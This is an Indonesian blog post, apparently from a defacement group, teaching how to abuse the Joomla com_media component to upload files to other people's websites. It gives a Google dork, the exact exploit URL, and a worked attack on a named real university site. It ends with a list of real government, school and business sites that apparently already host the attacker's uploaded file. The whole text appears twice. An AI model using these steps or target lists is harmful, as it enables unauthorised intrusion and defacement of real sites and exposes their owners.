Assalamualaikum ~ Kali ini saya mau membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joo...
Assalamualaikum ~
Kali ini saya mau membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla ^_^
Pada penasaran kan gimana caranya :v ?
Oke,, Langsung aja ~
Dork : inurl:option=com_media
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Pertama,, Kamu cari dulu Targetnya di google menggunakan Dork diatas ;)
Dork bisa dikreasikan koq,, heheheh :v
Biar bisa mendapatkan Target yang Fresh gitu :v :v
Disini saya sudah menyiapkan Targetnya ~
http://literature.haifa.ac.il
Nah ~
Kamu tinggal tambahin aja dengan Exploit yang ada Diatas, Jadinya begini ~
http://literature.haifa.ac.il/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Nah ~
Udah munculkan Bugnya ~
Sekarang kamu tinggal Upload File yang diinginkan dibagian Uploader ~
Note : File yang bisa diupload ber-extensikan .txt .jpg .gif .png ... Kalau .html atau .php sepertinya tidak bisa :v
Nah~
Kalau kamu sudah meng-Upload File silahkan lihat hasilnya disini ~
Contoh : http://literature.haifa.ac.il/images/ShaniaAttacker404.png
Tara ~
Bisa kan :p tinggal disubmit aja deh hasil Upload-an kamu :v :v
Udah dulu ya,, Semoga Bermamfaat ^_^
Live Target ~
~ http://pn-sleman.go.id/images/ShaniaAttacker404.png
~ http://eramas.co.id/images/ShaniaAttacker404.png
~ http://www.thealternateroot.com/images/ShaniaAttacker404.png
~ http://www.stiecendekia.ac.id/images/ShaniaAttacker404.png
~ http://www.matthayom13.go.th/images/ShaniaAttacker404.png
~ http://laikipiaonline.co.ke/images/ShaniaAttacker404.png
~ http://abusit.com.au/images/ShaniaAttacker404.png
Kali ini saya mau membahas mengenai Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component Media di CMS Joomla ^_^
Pada penasaran kan gimana caranya :v ?
Oke,, Langsung aja ~
Dork : inurl:option=com_media
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Pertama,, Kamu cari dulu Targetnya di google menggunakan Dork diatas ;)
Dork bisa dikreasikan koq,, heheheh :v
Biar bisa mendapatkan Target yang Fresh gitu :v :v
Disini saya sudah menyiapkan Targetnya ~
http://literature.haifa.ac.il
Nah ~
Kamu tinggal tambahin aja dengan Exploit yang ada Diatas, Jadinya begini ~
http://literature.haifa.ac.il/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Nah ~
Udah munculkan Bugnya ~
Sekarang kamu tinggal Upload File yang diinginkan dibagian Uploader ~
Note : File yang bisa diupload ber-extensikan .txt .jpg .gif .png ... Kalau .html atau .php sepertinya tidak bisa :v
Nah~
Kalau kamu sudah meng-Upload File silahkan lihat hasilnya disini ~
Contoh : http://literature.haifa.ac.il/images/ShaniaAttacker404.png
Tara ~
Bisa kan :p tinggal disubmit aja deh hasil Upload-an kamu :v :v
Udah dulu ya,, Semoga Bermamfaat ^_^
Live Target ~
~ http://pn-sleman.go.id/images/ShaniaAttacker404.png
~ http://eramas.co.id/images/ShaniaAttacker404.png
~ http://www.thealternateroot.com/images/ShaniaAttacker404.png
~ http://www.stiecendekia.ac.id/images/ShaniaAttacker404.png
~ http://www.matthayom13.go.th/images/ShaniaAttacker404.png
~ http://laikipiaonline.co.ke/images/ShaniaAttacker404.png
~ http://abusit.com.au/images/ShaniaAttacker404.png
COMMENTS